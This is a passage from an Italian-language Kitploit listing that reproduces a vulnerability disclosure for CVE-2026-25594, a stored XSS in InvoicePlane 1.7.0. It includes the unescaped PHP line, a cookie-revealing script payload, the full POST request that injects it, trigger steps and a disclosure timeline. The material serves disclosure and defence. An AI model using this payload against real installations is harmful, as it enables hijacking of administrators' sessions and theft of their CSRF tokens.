Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/lagathos/cve-2026-25594
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebApprendimento e Formazione
GitHublagathos/cve-2026-25594

CVE-2026-25594

# Proof-of-concept di XSS persistente per InvoicePlane 1.7.0 tramite il campo del cognome, inclusi payload, richiesta e analisi dell'impatto per ricerca difensiva.

Vedi Repository
5 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-25594 — XSS persistente tramite il campo Family Name in InvoicePlane 1.7.0

Vulnerabilità: Cross-Site Scripting (XSS) persistente tramite il campo Family Name

Prodotto: InvoicePlane

Versione interessata: 1.7.0 (e probabilmente versioni precedenti)

Gravità: Media

Punteggio CVSS 3.1: 4.8 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N)

CWE: CWE-79: Neutralizzazione impropria dell'input durante la generazione di pagine web

Scoperta da: Leonidas Agathos

Data del report: 2026-01-31


Descrizione

Il campo family_name nel modulo delle famiglie di prodotti (/index.php/families/form) accetta input arbitrario senza sanificazione. Il valore viene memorizzato nel database e successivamente renderizzato senza codifica nel menu a tendina delle famiglie nella pagina di creazione/modifica prodotto, causando l'esecuzione di JavaScript per qualsiasi amministratore che visiti il modulo prodotto.

File vulnerabile: application/modules/products/views/form.php:40

root@kitploit:~
// Linea 40
><?php echo $family->family_name; ?></option>

Prova di concetto

Passaggio 1 — Iniettare il payload nel campo Family Name

Navigare su /index.php/families/form e inviare quanto segue come Family Name:

root@kitploit:~
<script>alert('domain:'+document.domain+'cookies:'+document.cookie)</script>

Richiesta:

root@kitploit:~
POST /index.php/families/form HTTP/1.1
Host: 172.25.0.12
Content-Type: application/x-www-form-urlencoded

_ip_csrf=...&btn_submit=1&is_update=0&family_name=%3Cscript%3Ealert%28document.cookies%29%3C%2Fscript%3E

Passaggio 1 - Iniezione del payload XSS nel campo Family Name tramite Burp Suite

Passaggio 2 — Attivare l'XSS

Navigare su /index.php/products/form. Il payload viene eseguito quando viene renderizzato il menu a tendina delle famiglie.

Passaggio 2 - XSS in esecuzione sulla pagina del modulo Prodotto, con divulgazione di dominio e cookie


Impatto

Qualsiasi amministratore che visiti la pagina di creazione o modifica prodotto vedrà il payload eseguirsi nel proprio browser. Ciò consente il dirottamento della sessione (se i cookie non sono HttpOnly), il furto del token CSRF e azioni eseguite sotto l'identità della vittima.


Cronologia

DataEvento
2026-01-30Vulnerabilità scoperta
2026-01-31Prova di concetto sviluppata
2026-01-31Venditore notificato
2026-02-04Riconoscimento da parte del venditore
2026-02-04Patch rilasciata
2026-02-05Divulgazione pubblica

Riferimenti

  • CWE-79
  • OWASP: Cross-Site Scripting (XSS)
  • CVE-2026-25594

Disclaimer

Questa vulnerabilità è stata scoperta durante una ricerca di sicurezza indipendente. Tutte le informazioni sono fornite esclusivamente a scopo educativo, di ricerca e difensivo per assistere il venditore e la comunità della sicurezza nella comprensione e nella risoluzione del problema. Qualsiasi uso dannoso di queste informazioni è severamente vietato.

Scarica lo strumento